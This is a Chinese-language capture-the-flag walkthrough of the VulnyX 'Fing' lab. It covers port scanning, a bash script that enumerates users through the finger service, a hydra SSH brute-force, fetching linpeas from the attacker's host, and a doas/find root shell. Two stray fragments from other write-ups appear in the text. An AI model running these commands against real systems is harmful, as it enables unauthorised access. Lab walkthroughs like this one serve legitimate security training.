Fing

靶机说明

https://vulnyx.com/file/Fing.php

一、主机探测

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-04 16:08 CST
Nmap scan report for 192.168.2.1
Host is up (0.00084s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0013s latency).
MAC Address: 08:00:27:20:0E:1A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.45
Host is up (0.0014s latency).
MAC Address: 08:00:27:DF:B9:AC (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.10 seconds

IP地址：192.168.2.45

二、端口扫描

1、全端口扫描

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# nmap --min-rate 10000 -p- 192.168.2.45                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-04 16:08 CST
Nmap scan report for 192.168.2.45
Host is up (0.00019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
79/tcp open  finger
80/tcp open  http
MAC Address: 08:00:27:DF:B9:AC (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 24.07 seconds

开放端口：22,79,80

2、详细信息扫描

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,79,80 192.168.2.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-04 16:09 CST
Nmap scan report for 192.168.2.45
Host is up (0.00095s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
79/tcp open  finger  Linux fingerd
|_finger: No one logged on.\x0D
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
MAC Address: 08:00:27:DF:B9:AC (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.55 seconds

79端口：开放的服务是finger，并提示No one logged on，当前没有用户登录
80端口：Apache2 Debian的默认页面

3、UDP端口扫描

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# nmap -sU --top-ports 100 192.168.2.45                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-04 16:10 CST
Nmap scan report for 192.168.2.45
Host is up (0.00083s latency).
All 100 scanned ports on 192.168.2.45 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:DF:B9:AC (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.77 seconds

没有开放的UDP端口

三、WEB渗透

1、80端口

访问80端口，是一个Apache Debian的默认页面，没啥东西

目录扫描

尝试进行目录扫描，也没有发现任何东西，转79端口

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# gobuster dir -u http://192.168.2.45 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.45
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 10701]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

2、79端口

根据nmap扫描出来的结果，发现79端口运行的服务是finger

curl发现不允许

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# curl http://192.168.2.45:79
curl: (1) Received HTTP/0.9 when not allowed

xxxxxxxxxx2 1gift:~# cat root.txt 2HMVtyr543FGbash

查看一下finger命令的使用，发现可以访问远程主机的用户信息

• 如果用户存在，则会反馈具体的信息Login:...

  ┌──(root㉿kali)-[/miao/vulnyx/fing]
  └─# finger root@192.168.2.45       
  Login: root                             Name: root
  Directory: /root                        Shell: /bin/bash
  Last login Fri Jul 14 17:02 2023 (CEST) on tty1
  No mail.
  No Plan.

• 如果用户不存在，则反馈no such user

  ┌──(root㉿kali)-[/miao/vulnyx/fing]
  └─# finger admin@192.168.2.45
  finger: admin: no such user.

尝试写个脚本，爆破一下存在的用户

#!/bin/bash

# 目标主机配置
TARGET_HOST="192.168.2.45"
USER_FILE="./username.txt"

# 清空旧日志（改为终端提示）
echo "[!] 开始扫描: $TARGET_HOST | 用户字典: $(wc -l < "$USER_FILE") 个"

# 用户爆破核心逻辑
while IFS= read -r user; do
    echo -n "正在检测: $user → "
    
    # 执行finger命令并捕获输出
    output=$(finger -m "$user@$TARGET_HOST" 2>&1)
    
    # 判断结果有效性
    if [[ $output = *"Login"* ]]; then
        echo -e "\033[32m[+] 发现有效用户\033[0m"
        echo "详情: $output"
    else
        echo -e "\033[31m[-] 用户不存在\033[0m"
    fi
done < "$USER_FILE"

echo "[!] 扫描完成"

经过爆破，发现/home目录下面存在一个用户adam

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# ./finger.sh 
[!] 开始扫描: 192.168.2.45 | 用户字典: 1000 个
..........
正在检测: tigger → [-] 用户不存在
正在检测: chicken → [-] 用户不存在
正在检测: adam → [+] 发现有效用户
详情: Login: adam                               Name: adam
Directory: /home/adam                   Shell: /bin/bash
Last login Sun Apr 23 13:21 2023 (CEST) on pts/0 from 192.168.1.10
No mail.
No Plan.
..........

四、SSH密码爆破

尝试去登录，发现需要密码

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# ssh adam@192.168.2.45           
The authenticity of host '192.168.2.45 (192.168.2.45)' can't be established.
ED25519 key fingerprint is SHA256:3dqq7f/jDEeGxYQnF2zHbpzEtjjY49/5PvV5/4MMqns.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.45' (ED25519) to the list of known hosts.
adam@192.168.2.45's password: 
Permission denied, please try again.

使用hydra爆破密码，找到密码passion

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# hydra -t 64 -l adam -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt ssh://192.168.2.45 -F -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-04 17:43:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1000 login tries (l:1/p:1000), ~16 tries per task
[DATA] attacking ssh://192.168.2.45:22/
[STATUS] 536.00 tries/min, 536 tries in 00:01h, 502 to do in 00:01h, 26 active
[22][ssh] host: 192.168.2.45   login: adam   password: passion
[STATUS] attack finished for 192.168.2.45 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-07-04 17:45:05

五、获取user权限

┌──(root㉿kali)-[/miao/vulnyx/fing]
└─# ssh adam@192.168.2.45           
adam@192.168.2.45's password: 
Linux fing 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
Last login: Sun Apr 23 13:21:44 2023 from 192.168.1.10
adam@fing:~$ id
uid=1000(adam) gid=1000(adam) grupos=1000(adam)

USER FLAG

adam@fing:~$ cat user.txt 
ff18a9aca2d1dac41a5c26e6667bea9d

六、权限提升

xxxxxxxxxx3 1# cat /home/dragon/user.txt /root/root.txt2e1f9c2e8a1d8477f9b3f6cd298f9f3bd37a4d1b35eebf4aefa5f1b0198b0d6c17bash

adam@fing:/$ sudo -l
-bash: sudo: orden no encontrada

linpeas扫描

翻了好久没找到啥思路，直接使用提权脚本linpeas.sh跑一遍

adam@fing:/tmp$ wget http://192.168.2.4/linpeas.sh
--2025-07-04 12:14:52--  http://192.168.2.4/linpeas.sh
Conectando con 192.168.2.4:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 847920 (828K) [text/x-sh]
Grabando a: «linpeas.sh.1»

linpeas.sh.1                        100%[==================================================================>] 828,05K  --.-KB/s    en 0,01s   

2025-07-04 12:14:52 (57,0 MB/s) - «linpeas.sh.1» guardado [847920/847920]
adam@fing:/tmp$ chmod +x linpeas.sh
adam@fing:/tmp$ ./linpeas.sh 

最后在跑完的结果里面，找到一个关键信息doas

╔══════════╣ Checking doas.conf
permit nopass keepenv adam as root cmd /usr/bin/find

允许当前用户adam以root的权限执行/usr/bin/find

doas-find提权

参考https://gtfobins.github.io/gtfobins/find/，直接进行提权即可

adam@fing:/$ doas /usr/bin/find . -exec /bin/sh \; -quit
# id
uid=0(root) gid=0(root) grupos=0(root)

ROOT FLAG

# cat /root/root.txt
1edf2dfe68c6745e93affa42be9a80ce

【总结】

1、Finger

finger命令是一个用户信息查找程序，它可以显示系统用户的信息。
查询远程机上的用户信息，需要在用户名后面接@主机名，采用用户名@主机名的格式，不过要查询的网络主机需要运行finger守护进程的支持。

• 显示所有已登录用户的信息 finger
• 显示特定用户的信息 finger username
• 显示所有用户的详细信息 finger -l
• 显示所有用户的简短信息 finger -s

2、doas

OpenDoas是OpenBSD doas 命令的可移植版本，其大小比sudo更小。与sudo类似，doas也用于在系统上以其他用户的身份运行。

要使用doas，只需在命令及其参数前加上doas和空格：

以其他用户身份进入交互式 shell（省略将默认为root）： -u user

doas -u username